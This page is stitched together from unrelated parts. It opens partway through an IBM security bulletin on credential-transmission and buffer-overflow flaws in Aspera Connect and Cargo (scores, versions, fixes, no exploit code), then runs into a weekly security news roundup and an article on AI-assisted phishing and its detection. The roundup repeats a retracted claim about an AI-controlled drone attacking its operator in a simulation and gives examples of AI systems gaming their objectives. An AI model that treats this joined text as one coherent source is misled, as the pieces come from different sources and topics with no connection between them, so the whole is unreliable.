**DESCRIPTION:**   IBM Aspera Connect and IBM Aspera Cargo transmits authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.  
CVSS Base score: 5.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/244107 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2023-27285  
**DESCRIPTION:**   IBM Aspera Connect and IBM Aspera Cargo is vulnerable to a buffer overflow, caused by improper bounds checking. An attacker could overflow a buffer and execute arbitrary code on the system.  
CVSS Base score: 8.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/248625 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**Affected Products and Versions**

**Affected Product(s)**

**Version(s)**

IBM Aspera Connect

0.0.0 - 4.2.5

IBM Aspera Cargo

0.0.0 - 4.2.5

**Remediation/Fixes**

It is recommended to apply the fix as soon as possible, see links in the table below.

**Product**

**Fixing VRM**

**Platform**

**Link to Fix**

IBM Aspera Connect

4.2.6

Linux

click here

IBM Aspera Connect

4.2.6

Mac OSX

click here

IBM Aspera Connect

4.2.6

Windows

click here

IBM Aspera Cargo

4.2.6

Linux

click here

IBM Aspera Cargo

4.2.6

Mac OSX

click here

IBM Aspera Cargo

4.2.6

Windows

click here

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

2 June 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSQ65JJ","label":"IBM Aspera Enterprise"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"1.0.2","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSH2ME","label":"IBM Aspera Cargo"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"},{"code":"PF033","label":"Windows"},{"code":"PF017","label":"Mac OS"}\],"Version":"4.2.6","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SS8NDZ","label":"IBM Aspera"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"1.0","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSHI916","label":"IBM Aspera Enterprise On Demand"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"1.1","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSXMX3","label":"IBM Aspera Connect"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"},{"code":"PF017","label":"Mac OS"},{"code":"PF033","label":"Windows"}\],"Version":"4.2.6","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSRFYR","label":"IBM Aspera on Demand"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"1.0","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2023-22862: Security Bulletin: IBM Aspera Connect and IBM Aspera Cargo has addressed multiple vulnerabilities (CVE-2023-22862, CVE-2023-27285)

Plus: Amazon’s Ring was ordered to delete algorithms, North Korea’s failed spy satellite, and a rogue drone “attack” isn’t what it seems.

Code hidden inside PC motherboards left millions of machines vulnerable to malicious updates, researchers revealed this week. Staff at security firm Eclypsium found code within hundreds of models of motherboards created by Taiwanese manufacturer Gigabyte that allowed an updater program to download and run another piece of software. While the system was intended to keep the motherboard updated, the researchers found that the mechanism was implemented insecurely, potentially allowing attackers to hijack the backdoor and install malware.

Elsewhere, Moscow-based cybersecurity firm Kaspersky revealed that its staff had been targeted by newly discovered zero-click malware impacting iPhones. Victims were sent a malicious message, including an attachment, on Apple’s iMessage. The attack automatically started exploiting multiple vulnerabilities to give the attackers access to devices, before the message deleted itself. Kaspersky says it believes the attack impacted more people than just its own staff. On the same day as Kaspersky revealed the iOS attack, Russia’s Federal Security Service, also known as the FSB, claimed thousands of Russians had been targeted by new iOS malware and accused the US National Security Agency (NSA) of conducting the attack. The Russian intelligence agency also claimed Apple had helped the NSA. The FSB did not publish technical details to support its claims, and Apple said it has never inserted a backdoor into its devices.

If that’s not enough encouragement to keep your devices updated, we’ve rounded up all the security patches issued in May. Apple, Google, and Microsoft all released important patches last month—go and make sure you're up to date.

And there’s more. Each week we round up the security stories we didn’t cover in depth ourselves. Click on the headlines to read the full stories. And stay safe out there.

Lina Khan, the chair of the US Federal Trade Commission, warned this week that the agency is seeing criminals using artificial intelligence tools to “turbocharge” fraud and scams. The comments, which were made in New York and first reported by Bloomberg, cited examples of voice-cloning technology where AI was being used to trick people into thinking they were hearing a family member’s voice.

Recent machine-learning advances have made it possible for people’s voices to be imitated with only a few short clips of training data—although experts say AI-generated voice clips can vary widely in quality. In recent months, however, there has been a reported rise in the number of scam attempts apparently involving generated audio clips. Khan said that officials and lawmakers “need to be vigilant early” and that while new laws governing AI are being considered, existing laws still apply to many cases.

In a rare admission of failure, North Korean leaders said that the hermit nation’s attempt to put a spy satellite into orbit didn’t go as planned this week. They also said the country would attempt another launch in the future. On May 31, the Chollima-1 rocket, which was carrying the satellite, launched successfully, but its second stage failed to operate, causing the rocket to plunge into the sea. The launch triggered an emergency evacuation alert in South Korea, but this was later retracted by officials.

The satellite would have been North Korea’s first official spy satellite, which experts say would give it the ability to monitor the Korean Peninsula. The country has previously launched satellites, but experts believe they have not sent images back to North Korea. The failed launch comes at a time of high tensions on the peninsula, as North Korea continues to try to develop high-tech weapons and rockets. In response to the launch, South Korea announced new sanctions against the Kimsuky hacking group, which is linked to North Korea and is said to have stolen secret information linked to space development.

In recent years, Amazon has come under scrutiny for lax controls on people’s data. This week the US Federal Trade Commission, with the support of the Department of Justice, hit the tech giant with two settlements for a litany of failings concerning children’s data and its Ring smart home cameras.

In one instance, officials say, a former Ring employee spied on female customers in 2017—Amazon purchased Ring in 2018—viewing videos of them in their bedrooms and bathrooms. The FTC says Ring had given staff “dangerously overbroad access” to videos and had a “lax attitude toward privacy and security.” In a separate statement, the FTC said Amazon kept recordings of kids using its voice assistant Alexa and did not delete data when parents requested it.

The FTC ordered Amazon to pay around $30 million in response to the two settlements and introduce some new privacy measures. Perhaps more consequentially, the FTC said that Amazon should delete or destroy Ring recordings from before March 2018 as well as any “models or algorithms” that were developed from the data that was improperly collected. The order has to be approved by a judge before it is implemented. Amazon has said it disagrees with the FTC, and it denies “violating the law,” but it added that the “settlements put these matters behind us.”

As companies around the world race to build generative AI systems into their products, the cybersecurity industry is getting in on the action. This week OpenAI, the creator of text- and image-generating systems ChatGPT and Dall-E, opened a new program to work out how AI can best be used by cybersecurity professionals. The project is offering grants to those developing new systems.

OpenAI has proposed a number of potential projects, ranging from using machine learning to detect social engineering efforts and producing threat intelligence to inspecting source code for vulnerabilities and developing honeypots to trap hackers. While recent AI developments have been faster than many experts predicted, AI has been used in the cybersecurity industry for several years—although many claims don’t necessarily live up to the hype.

The US Air Force is moving quickly on testing artificial intelligence in flying machines—in January, it tested a tactical aircraft being flown by AI. However, this week, a new claim started circulating: that during a simulated test, a drone controlled by AI started to “attack” and “killed” a human operator overseeing it, because they were stopping it from accomplishing its objectives.

“The system started realizing that while they did identify the threat, at times the human operator would tell it not to kill that threat, but it got its points by killing that threat,” said Colnel Tucker Hamilton, according to a summary of an event at the Royal Aeronautical Society, in London. Hamilton continued to say that when the system was trained to not kill the operator, it started to target the communications tower the operator was using to communicate with the drone, stopping its messages from being sent.

However, the US Air Force says the simulation never took place. Spokesperson Ann Stefanek said the comments were “taken out of context and were meant to be anecdotal.” Hamilton has also clarified that he “misspoke” and he was talking about a “thought experiment.”

Despite this, the described scenario highlights the unintended ways that automated systems could bend rules imposed on them to achieve the goals they have been set to achieve. Called specification gaming by researchers, other instances have seen a simulated version of _Tetris_ pause the game to avoid losing, and an AI game character killed itself on level one to avoid dying on the next level.

AI Is Being Used to ‘Turbocharge’ Scams

Criminals may use artificial intelligence to scam you. Companies, like Google, are looking for ways AI and machine learning can help prevent phishing.

When Aparna Pappu, vice president and general manager of Google Workspace, spoke at Google I/O on May 10, she laid out a vision for artificial intelligence that helps users wade through their inbox. Pappu showed how generative AI can whisper summaries of long email threads in your ear, pull in relevant data from local files as you salsa together through unread messages, and dip you low to the ground as it suggests insertable text. Welcome to the inbox of the future. 

While the specifics of how it’ll arrive remain unclear, generative AI is poised to fundamentally alter how people communicate over email.  A broader subset of AI, called machine learning, already performs a kind of safety dance long after you've logged off. “Machine learning has been a critical part of what we’ve used to secure Gmail,” Pappu tells WIRED.

A few, errant clicks on a suspicious email can wreak havoc on your security, so how does machine learning help deflect phishing attacks? Neil Kumaran, a product lead at Google who focuses on security, explains that machine learning can look at the phrasing of incoming emails and compare it to past attacks. It can also flag unusual message patterns and sniff out any weirdness emanating from the metadata.

Machine learning can do more than just flag dangerous messages as they pop up. Kumaran points out that it also can be used to track the people responsible for phishing attacks. He says, “At the time of account creation, we do evaluations. We try to figure out, ‘Does it look like this account is going to be used for malicious purposes?’” In the event of a successful phishing attack on your Google account, AI is involved with the recovery process as well. The company uses machine learning to help decide which login attempts are legit.

“How do we extrapolate intelligence from user reports to identify attacks that we may not know about, or at least start to model the impact on our users?” asks Kumaran. The answer from Google, like the answer to many questions in 2023, is more AI. This instance of AI is not a flirty chatbot teasing you with long exchanges late into the night; it’s a burly bouncer kicking out the rabble-rousers with its algorithmic arms crossed.

On the reverse side, what’s instigating even more phishing attacks on your email inbox? I’ll give you one guess. First letter “A,” last letter “I.” For years, security experts have warned about the potential for AI-generated phishing attacks to overwhelm your inbox. “It’s very, very hard to detect AI with the naked eye, either through the dialect or through the URL,” says Patrick Harr, CEO of SlashNext, a messaging security company. Just like when people use AI-generated images and videos to create fairly convincing deepfakes, attackers may use AI-generated text to personalize phishing attempts in a way that’s difficult for users to detect.

Multiple companies focused on email security are working on models and using machine-learning techniques in an effort to further protect your inbox. “We take the corpus of data that’s coming in and do what’s called supervised learning,” says Hatem Naguib, CEO of Barracuda Networks, an IT security firm. In supervised learning, someone adds labels to a portion of the email data. Which messages are likely to be safe? Which ones are suspicious? This data is extrapolated to help a company flag phishing attacks with machine learning.

It's a valuable aspect of phishing detection, but attackers remain on the prowl for ways to circumvent protections. A persistent scam about a made-up Yeti Cooler giveaway evaded filters last year with an unexpected kind of HTML anchoring. 

Cybercriminals will remain intent on hacking your online accounts, especially your business email. Those who utilize generative AI may be able to better translate their phishing attacks into multiple languages, and chatbot-style applications can automate parts of the back-and-forth messages with potential victims.

Despite all of the possible phishing attacks enabled by AI, Aparna Pappu remains optimistic about the continued development of better, more refined security protections. “You’ve lowered the cost of what it takes to potentially lure someone,” she says. “But, on the flip side, we’ve built up greater detection capabilities as a result of these technologies.”

Tag

#mac